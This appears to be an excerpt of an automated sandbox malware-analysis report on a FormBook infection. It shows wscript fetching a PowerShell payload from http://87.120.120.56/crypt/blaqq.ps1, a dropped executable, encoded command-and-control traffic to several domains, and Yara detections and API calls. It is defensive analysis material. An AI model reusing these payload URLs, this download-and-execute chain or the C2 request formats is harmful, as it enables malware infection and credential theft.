              Source: global trafficHTTP traffic detected: GET /ieqn/?R2Pdz6z=TXRwMNvNe7nWWxt3foly+vYqMMoYCv5ex1DbWUgtb2d4F8KnEpYV+vzhvlMsQa+lONHY0YO0NRtIMjRYmzePLVgH7GtSKegHe4K9kT7HvpWQZuKLFIjswIaoNQtKaIPyYQ==&y2S=EVRHgpGhH HTTP/1.1Host: www.meacci.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /f0c8/?R2Pdz6z=AHWHpIA83/7LQm5zc0lHPZL2Z5yUztqrVryDOXq41boPuGcZhCFY31qeBhUxRWAvz/oWZxf8/TvWsA/XLj8peYqUpYM4Gw3Jjp9Dwid7Hyhq7fIRl4Ljybjye2cQEtfmHw==&y2S=EVRHgpGhH HTTP/1.1Host: www.sfrouter.expressAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficDNS traffic detected: DNS query: www.zkplant.xyz
              Source: global trafficDNS traffic detected: DNS query: www.adventurerepair24.live
              Source: global trafficDNS traffic detected: DNS query: www.meacci.xyz
              Source: global trafficDNS traffic detected: DNS query: www.sfrouter.express
              Source: global trafficDNS traffic detected: DNS query: www.trosky.lol
              Source: unknownHTTP traffic detected: POST /gc4d/ HTTP/1.1Host: www.adventurerepair24.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.adventurerepair24.liveReferer: http://www.adventurerepair24.live/gc4d/Cache-Control: no-cacheContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 52 32 50 64 7a 36 7a 3d 47 63 7a 6c 65 72 77 34 62 50 4a 55 76 6a 55 75 57 4b 4b 75 4e 57 58 4d 6f 52 41 63 30 4e 36 4e 4f 79 32 2b 72 6e 33 62 4f 7a 72 46 79 53 69 71 4b 63 57 42 38 67 77 36 78 4e 73 38 38 62 73 72 63 56 51 51 33 6b 51 70 65 2f 4d 33 6c 32 38 58 31 46 56 43 6d 2b 4c 72 45 46 50 37 65 36 62 66 64 6d 46 4f 33 7a 31 6d 49 67 4e 46 35 6e 70 70 33 4e 34 63 6c 2b 52 36 7a 6d 45 35 6c 46 31 78 56 30 78 72 2b 61 51 51 32 4d 4e 6c 56 4d 70 71 41 7a 70 6c 57 70 72 67 6f 41 69 35 61 61 52 33 51 32 50 78 30 74 48 33 66 57 4b 75 58 61 4f 55 4c 44 44 38 6e 50 6c 77 79 56 61 70 4a 4b 44 57 4a 77 38 6e 6a 52 63 3d Data Ascii: R2Pdz6z=Gczlerw4bPJUvjUuWKKuNWXMoRAc0N6NOy2+rn3bOzrFySiqKcWB8gw6xNs88bsrcVQQ3kQpe/M3l28X1FVCm+LrEFP7e6bfdmFO3z1mIgNF5npp3N4cl+R6zmE5lF1xV0xr+aQQ2MNlVMpqAzplWprgoAi5aaR3Q2Px0tH3fWKuXaOULDD8nPlwyVapJKDWJw8njRc=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:17:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MmiuxhBRSHHWjImiMdkthfeUMnKmcrjJTXl3cYPdAILyvC2fGIPqFqRnIfhCzyGcS7vHmBSGLl2QEnbo5eN8SF2lqjggye1pBsTxGRgFiqt3ONONqFXgP2a1vHYL6etsp3BHYzn22hR8%2Ft69SA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105feadee58c32f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:17:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FD2xDffN8PFXrpBqszegihqajMN8y3SQFtFl9ckVCLHN8x8FT%2B9sQjDMVewkrjWnRs1ORmkfi30fNlpPOh4Mx5%2BoEEGGKUVJYw8d37C7Et0nj8%2B0B510gYKrei89N94crILT3nYgMBeCkD5Nw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105febdefbf1851-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=851&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:17:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivWPftjNeTD4yqaSVeiSX8a0qqPSZr9l2nUISk9B%2FgsWxK8NjxzDbDfYDSxsA7BRG5N0bhYOwibTVy6P%2BHPmH%2Ff2k4nbelwJ%2BFkdVy%2F2w0sMHF2wSc2vVoNFJmIo4KWwQQ3P5zzBc6iYSf2IeA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105fecdb8500c8e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1502&rtt_var=751&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1868&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 17:17:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8IB88h7H8YRIFxx4wI0QToSh36qze%2BaAEJWjJ8FB3MBBlKJskqNUAaHwW7cz%2FYF53fvuGapSBTu2WIpuAM6wgI%2FQ9IiJluAME2Y09LehbSe%2FPPOit8ikekq3QV%2F8azbxhbRFLsRYhs7H1O5bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9105fedd9de37d26-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1905&min_rtt=1905&rtt_var=952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=553&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 64 76 65 6e 74 75 72 65 72 65 70 61 69 72 32 34 2e 6c 69 76 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.adventurerepair24.live Port 80</address></body></html>0
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120
              Source: x.exe, 00000004.00000002.2219132764.0000000003EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/c
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/cr
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/cry
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/cryp
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/bla
              Source: x.exe, 00000004.00000002.2219132764.0000000003E5E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.2219132764.0000000003E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaq.exe
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqB
              Source: wscript.exe, 00000000.00000002.2238347331.0000019EA7B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236998434.0000019EA7B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqq
              Source: wscript.exe, wscript.exe, 00000000.00000003.2237149174.0000019EA9AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236811410.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2236811410.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235955514.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2239294734.0000019EA9960000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2238574754.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2238574754.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235955514.0000019EA7BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqq.ps1
              Source: wscript.exe, 00000000.00000002.2238248307.0000019EA7B6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqq.ps1-10035VDI
              Source: wscript.exe, 00000000.00000003.2236811410.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2238574754.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235955514.0000019EA7BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqq.ps12
              Source: wscript.exe, 00000000.00000003.2237149174.0000019EA9AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.120.56/crypt/blaqq.ps1p
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B877C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2201939820.00000149C752D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B75B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B7381000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.2219132764.0000000003EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B75B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000002.3363072352.0000000001620000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trosky.lol
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000002.3363072352.0000000001620000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.trosky.lol/o88r/
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B7381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000002.00000002.2201939820.00000149C752D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.2201939820.00000149C752D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.2201939820.00000149C752D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B75B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2218418793.00000149CF3BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.cou
              Source: wscript.exe, 00000000.00000003.2236811410.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235955514.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2238574754.0000019EA7C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: systray.exe, 00000009.00000002.3362471676.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: systray.exe, 00000009.00000002.3362471676.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: systray.exe, 00000009.00000002.3362471676.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: systray.exe, 00000009.00000002.3362471676.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: systray.exe, 00000009.00000003.2853977245.0000000007EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B877C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2201939820.00000149C752D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000002.00000002.2181585118.00000149B839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: HDIZeRcLxXsNvd.exe, 00000008.00000002.3367926182.000000000732A000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000009.00000002.3365366897.0000000007C30000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363843004.0000000005C3A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: systray.exe, 00000009.00000003.2859320858.0000000007F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 5.2.RegAAsm.exe.7d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.3362243547.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363072352.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2678660679.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362422336.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363813241.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362962777.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677237054.00000000007D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677849171.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 1848, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              PE file contains section with special chars
              Source: x.exe.2.drStatic PE information: section name: 1ZG(oi<
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007FCAA3 NtClose,5_2_007FCAA3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DAAA1 NtDelayExecution,5_2_007DAAA1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D1768 NtProtectVirtualMemory,5_2_007D1768
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014135C0 NtCreateMutant,LdrInitializeThunk,5_2_014135C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412B60 NtClose,LdrInitializeThunk,5_2_01412B60
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01412DF0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01412C70
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01413010 NtOpenDirectoryObject,5_2_01413010
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01413090 NtSetValueKey,5_2_01413090
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01414340 NtSetContextThread,5_2_01414340
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01414650 NtSuspendThread,5_2_01414650
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014139B0 NtGetContextThread,5_2_014139B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412BE0 NtQueryValueKey,5_2_01412BE0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412BF0 NtAllocateVirtualMemory,5_2_01412BF0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412B80 NtQueryInformationFile,5_2_01412B80
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412BA0 NtEnumerateValueKey,5_2_01412BA0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412AD0 NtReadFile,5_2_01412AD0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412AF0 NtWriteFile,5_2_01412AF0
